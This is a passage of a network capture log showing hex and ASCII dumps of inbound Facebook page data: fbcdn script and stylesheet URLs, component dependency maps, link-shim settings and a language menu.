2022-10-07 13:59:18 UTC	537	IN	Data Raw: 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 59 79 46 76 78 65 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 34 5c 2f 72 5c 2f 4a 34 6e 70 77 62 4a 4b 45 42 63 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 47 70 51 46 42 77 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 6f 5c 2f 72 5c 2f 79 2d 41 54 4f 4e 71 45 33 78 55 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 Data Ascii: Kz","nc":1},"YyFvxed":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y4\/r\/J4npwbJKEBc.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"GpQFBwL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yo\/r\/y-ATONqE3xU.js?_nc_x=Ij3Wp8lg5Kz","nc
2022-10-07 13:59:18 UTC	539	IN	Data Raw: 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 36 5c 2f 72 5c 2f 6a 46 64 33 32 69 74 65 71 53 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 65 50 65 34 5a 52 36 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 7a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 6a 6c 6d 66 58 4f 30 5a 67 53 6a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 63 59 55 33 63 33 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c Data Ascii: atic.xx.fbcdn.net\/rsrc.php\/v3\/y6\/r\/jFd32iteqSa.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ePe4ZR6":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLl54\/yz\/l\/en_US\/jlmfXO0ZgSj.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"cYU3c32":{"type":"js","src":"https:\
2022-10-07 13:59:18 UTC	540	IN	Data Raw: 2c 63 72 6f 73 73 5c 2f 63 56 4f 6a 69 6a 6c 6c 50 45 55 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 71 79 6d 59 42 59 7a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 33 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 34 68 74 76 78 2d 4e 79 52 4d 48 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6e 7a 41 4b 76 4c 79 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 Data Ascii: ,cross\/cVOjijllPEU.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"qymYBYz":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y3\/l\/0,cross\/4htvx-NyRMH.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"nzAKvLy":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php
2022-10-07 13:59:18 UTC	542	IN	Data Raw: 6e 63 22 3a 31 7d 2c 22 6b 53 39 54 42 76 4f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 72 5c 2f 53 5a 6c 30 34 48 30 4c 54 62 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6c 6c 34 5a 47 5c 2f 79 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 6a 7a 51 34 5c 2f 79 4a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 71 6b 53 71 62 4a 44 46 59 76 4e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 Data Ascii: nc":1},"kS9TBvO":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/r\/SZl04H0LTbR.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"ll4ZG\/y":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ijzQ4\/yJ\/l\/en_US\/qkSqbJDFYvN.js?_nc_x=Ij3Wp8lg
2022-10-07 13:59:18 UTC	543	IN	Data Raw: 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 58 74 71 34 5c 2f 79 69 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 7a 41 73 33 37 61 0d 0a 61 64 38 32 0d 0a 63 57 57 46 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 39 79 48 75 61 59 74 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 54 66 62 34 5c 2f 79 56 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 57 38 59 76 5a 51 4d 4a 35 6a 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 48 45 4b 32 34 75 67 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 Data Ascii: et\/rsrc.php\/v3iXtq4\/yi\/l\/en_US\/zAs37aad82cWWFX.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"9yHuaYt":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iTfb4\/yV\/l\/en_US\/W8YvZQMJ5jG.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"HEK24ug":{"type":"js","src":"ht
2022-10-07 13:59:18 UTC	544	IN	Data Raw: 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 50 5c 2f 6d 72 35 56 45 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 64 61 74 61 3a 74 65 78 74 5c 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3b 62 61 73 65 36 34 2c 49 32 4a 76 62 33 52 73 62 32 46 6b 5a 58 4a 66 55 46 39 74 63 6a 56 57 52 58 74 6f 5a 57 6c 6e 61 48 51 36 4e 44 4a 77 65 44 74 39 4c 6d 4a 76 62 33 52 73 62 32 46 6b 5a 58 4a 66 55 46 39 74 63 6a 56 57 52 58 74 6b 61 58 4e 77 62 47 46 35 4f 6d 4a 73 62 32 4e 72 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 22 2c 22 6e 63 22 3a 31 2c 22 64 22 3a 31 7d 7d 2c 22 63 6f 6d 70 4d 61 70 22 3a 7b 22 44 6f 63 6b 22 3a 7b 22 72 22 3a 5b 22 51 4d 6d 34 47 43 6d 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c Data Ascii: z","nc":1},"P\/mr5VE":{"type":"css","src":"data:text\/css; charset=utf-8;base64,I2Jvb3Rsb2FkZXJfUF9tcjVWRXtoZWlnaHQ6NDJweDt9LmJvb3Rsb2FkZXJfUF9tcjVWRXtkaXNwbGF5OmJsb2NrIWltcG9ydGFudDt9","nc":1,"d":1}},"compMap":{"Dock":{"r":["QMm4GCm","n6W4xMH","8zbEZtu",
2022-10-07 13:59:18 UTC	546	IN	Data Raw: 69 6d 61 74 69 6f 6e 22 5d 2c 22 72 22 3a 5b 22 68 4b 59 30 51 4b 54 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 55 52 49 22 3a 7b 22 72 22 3a 5b 5d 2c 22 62 65 22 3a 31 7d 2c 22 74 72 61 63 6b 52 65 66 65 72 72 65 72 22 3a 7b 22 72 22 3a 5b 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 2c 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 54 61 67 41 70 70 72 6f 76 61 6c 22 3a 7b 22 72 22 3a 5b 22 74 6a 6d 6b 2b 30 4b 22 2c 22 78 4d 44 30 34 37 63 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 51 4d 6d 34 Data Ascii: imation"],"r":["hKY0QKT","dAxX0jj","e9ANzw\/"]},"be":1},"URI":{"r":[],"be":1},"trackReferrer":{"r":[],"rds":{"m":["BanzaiScuba_DEPRECATED"],"r":["8zbEZtu","hKY0QKT","BIylKC4"]},"be":1},"PhotoTagApproval":{"r":["tjmk+0K","xMD047c","8zbEZtu","vGt2mxz","QMm4
2022-10-07 13:59:18 UTC	547	IN	Data Raw: 6d 22 2c 22 78 4d 44 30 34 37 63 22 2c 22 30 52 57 4b 4f 41 63 22 2c 22 5a 57 4a 38 78 38 55 22 2c 22 69 4a 37 4e 57 45 4a 22 2c 22 56 4b 39 6b 6a 61 74 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 69 4e 52 54 6c 6e 71 22 2c 22 30 61 37 70 77 2b 35 22 2c 22 42 4b 58 30 32 50 47 22 2c 22 4d 34 66 48 6f 4e 67 22 2c 22 4c 6d 4b 32 73 56 4b 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 5a 4c 6d 76 41 4b 71 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 4a 4f 4c 4c 30 34 32 22 2c 22 6b 77 53 79 46 6a 4e 22 2c 22 5c 2f 6f 35 59 76 4f 32 22 2c 22 48 6b 75 38 2b 5a 5a 22 2c 22 64 52 36 75 38 53 70 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 51 6f 4b 62 39 52 48 22 2c 22 4b 73 62 52 73 33 75 22 2c 22 47 70 51 46 42 77 4c 22 2c 22 42 44 52 74 6b 2b 43 22 2c 22 Data Ascii: m","xMD047c","0RWKOAc","ZWJ8x8U","iJ7NWEJ","VK9kjat","n6W4xMH","8zbEZtu","iNRTlnq","0a7pw+5","BKX02PG","M4fHoNg","LmK2sVK","X9nr65a","ZLmvAKq","Z2GjVu9","JOLL042","kwSyFjN","\/o5YvO2","Hku8+ZZ","dR6u8Sp","hKY0QKT","QoKb9RH","KsbRs3u","GpQFBwL","BDRtk+C","
2022-10-07 13:59:18 UTC	549	IN	Data Raw: 73 62 52 73 33 75 22 2c 22 78 32 6c 72 47 41 57 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6b 53 39 54 42 76 4f 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 4f 4a 30 33 31 65 37 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 6e 41 47 52 49 34 69 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 30 37 4a 53 69 50 30 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 72 22 3a 5b 22 64 41 78 58 30 6a 6a 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 5d 7d 2c 22 62 65 Data Ascii: sbRs3u","x2lrGAW","vGt2mxz","kS9TBvO","lWOvGTa","h3ZzAmG","OJ031e7","BIylKC4","nAGRI4i","Fn3rAl7","RPLH8jg","07JSiP0"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"r":["dAxX0jj","e9ANzw\/"]},"be
2022-10-07 13:59:18 UTC	550	IN	Data Raw: 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 2c 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 43 6f 6e 66 69 72 6d 61 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 6f 45 34 44 6f 66 54 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 51 4d 6d 34 47 43 6d 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 51 50 4c 49 6e 73 70 65 63 74 6f 72 22 3a 7b 22 72 22 3a 5b 22 56 76 56 46 77 38 6e 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 52 65 61 63 74 44 4f 4d 22 3a 7b 22 72 22 3a 5b 22 73 72 50 6d 64 74 34 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 64 Data Ascii: tLogging","IntlQtEventFalcoEvent"],"r":["BIylKC4","hKY0QKT"]},"be":1},"ConfirmationDialog":{"r":["oE4DofT","8zbEZtu","Z2GjVu9","vGt2mxz","BIylKC4","QMm4GCm"],"be":1},"QPLInspector":{"r":["VvVFw8n"],"be":1},"ReactDOM":{"r":["srPmdt4","07JSiP0","R5w1rCJ","d
2022-10-07 13:59:18 UTC	552	IN	Data Raw: 49 61 52 5c 2f 36 75 50 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 6f 42 5c 2f 79 58 67 33 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 4b 73 62 52 73 33 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 72 22 3a 5b 22 68 4b 59 30 51 4b 54 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 52 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 73 72 50 6d 64 74 34 22 2c 22 30 37 4a 53 69 50 30 22 5d 2c 22 62 65 Data Ascii: IaR\/6uP","QMm4GCm","n6W4xMH","oB\/yXg3","8zbEZtu","X9nr65a","Z2GjVu9","KsbRs3u","vGt2mxz","lWOvGTa","h3ZzAmG","BIylKC4","Fn3rAl7","RPLH8jg"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent"],"r":["hKY0QKT"]},"be":1},"React":{"r":["srPmdt4","07JSiP0"],"be
2022-10-07 13:59:18 UTC	553	IN	Data Raw: 5f 75 73 65 5f 68 74 74 70 73 22 3a 66 61 6c 73 65 2c 22 6f 6e 69 6f 6e 5f 61 6c 77 61 79 73 5f 73 68 69 6d 22 3a 74 72 75 65 2c 22 6d 69 64 64 6c 65 5f 63 6c 69 63 6b 5f 72 65 71 75 69 72 65 73 5f 65 76 65 6e 74 22 3a 66 61 6c 73 65 2c 22 77 77 77 5f 73 61 66 65 5f 6a 73 5f 6d 6f 64 65 22 3a 22 68 6f 76 65 72 22 2c 22 6d 5f 73 61 66 65 5f 6a 73 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 67 68 6c 5f 70 61 72 61 6d 5f 6c 69 6e 6b 5f 73 68 69 6d 22 3a 66 61 6c 73 65 2c 22 63 6c 69 63 6b 5f 69 64 73 22 3a 5b 5d 2c 22 69 73 5f 6c 69 6e 6b 73 68 69 6d 5f 73 75 70 70 6f 72 74 65 64 22 3a 74 72 75 65 2c 22 63 75 72 72 65 6e 74 5f 64 6f 6d 61 69 6e 22 3a 22 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 22 2c 22 62 6c 6f 63 6b 6c 69 73 74 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 5b Data Ascii: _use_https":false,"onion_always_shim":true,"middle_click_requires_event":false,"www_safe_js_mode":"hover","m_safe_js_mode":null,"ghl_param_link_shim":false,"click_ids":[],"is_linkshim_supported":true,"current_domain":"facebook.com","blocklisted_domains":[
2022-10-07 13:59:18 UTC	555	IN	Data Raw: 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 30 5f 31 68 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 42 61 68 61 73 61 20 49 6e 64 6f 6e 65 73 69 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 64 61 5f 44 4b 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f Data Ascii: :false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_0_1h"},"label":"Bahasa Indonesia","title":"","className":"headerItem"},{"class":"headerItem","value":"da_DK","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__
2022-10-07 13:59:18 UTC	556	IN	Data Raw: 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 69 74 5f 49 54 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 42 2b 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 75 5f 48 55 22 Data Ascii: ,"className":"headerItem"},{"class":"headerItem","value":"it_IT","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_8_B+"},"label":"Italiano","title":"","className":"headerItem"},{"class":"headerItem","value":"hu_HU"
2022-10-07 13:59:18 UTC	558	IN	Data Raw: 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 4d 73 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 52 6f 6d 5c 75 30 30 65 32 6e 5c 75 30 31 30 33 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 66 69 5f 46 49 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 65 5c 2f 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 53 75 6f 6d 69 22 Data Ascii: kup":{"__m":"__markup_3310c079_0_f_Ms"},"label":"Rom\u00e2n\u0103","title":"","className":"headerItem"},{"class":"headerItem","value":"fi_FI","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_g_e\/"},"label":"Suomi"
2022-10-07 13:59:18 UTC	559	IN	Data Raw: 33 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 65 5f 49 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 57 66 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b Data Ascii: 39","title":"","className":"headerItem"},{"class":"headerItem","value":"he_IL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_n_Wf"},"label":"\u05e2\u05d1\u05e8\u05d9\u05ea","title":"","className":"headerItem"},{
2022-10-07 13:59:18 UTC	561	IN	Data Raw: 39 39 39 39 5c 75 36 65 32 66 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6a 61 5f 4a 50 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 68 4f 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c Data Ascii: 9999\u6e2f)","title":"","className":"headerItem"},{"class":"headerItem","value":"ja_JP","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_u_hO"},"label":"\u65e5\u672c\u8a9e","title":"","className":"headerItem"},{"cl
2022-10-07 13:59:18 UTC	562	IN	Data Raw: 2c 31 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 4f 52 22 2c 5b 22 50 6f 70 6f 76 65 72 22 2c 22 5f 5f 65 6c 65 6d 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 58 34 22 2c 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 6e 50 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 75 74 6f 46 6c 69 70 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 43 6c 61 73 73 4f 6e 43 6f 6e 74 65 78 74 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 58 34 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 6e 50 22 7d 2c 5b 7b 22 5f 5f 6d Data Ascii: ,1],["__inst_1de146dc_0_0_OR",["Popover","__elem_1de146dc_0_0_X4","__elem_ec77afbd_0_0_nP","ContextualLayerAutoFlip","ContextualDialogArrow","ContextualLayerPositionClassOnContext"],[{"__m":"__elem_1de146dc_0_0_X4"},{"__m":"__elem_ec77afbd_0_0_nP"},[{"__m
2022-10-07 13:59:18 UTC	563	IN	Data Raw: 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 37 65 37 61 34 34 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 34 5c 22 3e 50 72 6f 76 69 64 65 20 61 20 73 61 66 65 72 20 65 78 70 65 72 69 65 6e 63 65 20 62 79 20 75 73 69 6e 67 20 69 6e 66 6f 72 